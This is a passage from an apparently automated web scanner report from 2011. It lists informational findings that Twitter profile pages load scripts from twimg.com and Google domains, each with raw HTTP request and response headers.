<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.288. http://twitter.com/buyantsogtoo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/buyantsogtoo

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758
http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /buyantsogtoo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570799-74375-37658
ETag: "364468a11a20806213cf8eb3c5356618"
Last-Modified: Tue, 01 Feb 2011 14:33:19 GMT
X-Runtime: 0.00791
Content-Type: text/html; charset=utf-8
Content-Length: 52881
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570799027712; path=/; expires=Tue, 08-Feb-11 14:33:19 GMT; domain=.twitter.com
Set-Cookie: guest_id=1296570799040535; path=/; expires=Thu, 03 Mar 2011 14:33:19 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQ2NzZkMGVmMDMxYmNiN2IxZjBmOTdmN2VhMTRhZjMzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIwVOk4S0B--7af583231980c89fe8b1a8b6c0b84deaf067171e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758" type="text/javascript"></script>
...[SNIP]...

18.289. http://twitter.com/chain_llc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/chain_llc

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758
http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /chain_llc HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570768-10807-47801
ETag: "f9a393245c11bc02c2ae91805680e7ec"
Last-Modified: Tue, 01 Feb 2011 14:32:48 GMT
X-Runtime: 0.01474
Content-Type: text/html; charset=utf-8
Content-Length: 38705
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570765904767; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=12965707683009389; path=/; expires=Thu, 03 Mar 2011 14:32:48 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTNkOGIzZjA0MzgzOTVmMjU4NjQyMDQwZjA1NTg1MzBmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIsNuj4S0B--862e59bb3bd797cae7bb00e4d5f0ae979dd432a7; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758" type="text/javascript"></script>
...[SNIP]...

18.290. http://twitter.com/chain_llc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/chain_llc

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /chain_llc HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:26:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663983-31844-33948
ETag: "d4e602cf405cab846f54d1b0ce165ea3"
Last-Modified: Wed, 02 Feb 2011 16:26:23 GMT
X-Runtime: 0.01134
Content-Type: text/html; charset=utf-8
Content-Length: 38761
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.291. http://twitter.com/chain_llc_cod previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/chain_llc_cod

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /chain_llc_cod HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:28:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664094-98967-58988
ETag: "c910af68926fe6abfd5353cbaf1b335f"
Last-Modified: Wed, 02 Feb 2011 16:28:14 GMT
X-Runtime: 0.01201
Content-Type: text/html; charset=utf-8
Content-Length: 38742
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.292. http://twitter.com/chain_llc_cod previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/chain_llc_cod

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560
http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560
http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /chain_llc_cod HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570792-52582-15646
ETag: "75cf00f02d3fa94a4cce59ac510bc0b6"
Last-Modified: Tue, 01 Feb 2011 14:33:12 GMT
X-Runtime: 0.01503
Content-Type: text/html; charset=utf-8
Content-Length: 38868
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570792676013; path=/; expires=Tue, 08-Feb-11 14:33:12 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657079280389025; path=/; expires=Thu, 03 Mar 2011 14:33:12 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTMwMzMxNzg4MGI3NmU0YzUzNWMyODY2OWI5YTE0YmZhIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIZTuk4S0B--8fef274b328043273d28c9d450850d5560e59e88; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560" type="text/javascript"></script>
...[SNIP]...

18.293. http://twitter.com/chain_llc_mg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/chain_llc_mg

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /chain_llc_mg HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:26:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663961-61418-24454
ETag: "cc1a5627524b8bd5b5aa93c51e03f91c"
Last-Modified: Wed, 02 Feb 2011 16:26:01 GMT
X-Runtime: 0.00783
Content-Type: text/html; charset=utf-8
Content-Length: 37918
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.294. http://twitter.com/chain_llc_mg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/chain_llc_mg

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758
http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /chain_llc_mg HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570768-88752-1879
ETag: "e7b448ce41f072da7cf0c0e79e7ea904"
Last-Modified: Tue, 01 Feb 2011 14:32:48 GMT
X-Runtime: 0.02410
Content-Type: text/html; charset=utf-8
Content-Length: 37922
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570765567580; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657076829194484; path=/; expires=Thu, 03 Mar 2011 14:32:48 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTI3MjVhMGJiZTQ1ZDk4ZGZhMTRlMjQyM2E4Y2VmY2QyIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIpduj4S0B--efc213a9b24ebd70cca35dda557409a2fd957e56; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758" type="text/javascript"></script>
...[SNIP]...

18.295. http://twitter.com/cloudscan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/cloudscan

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /cloudscan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
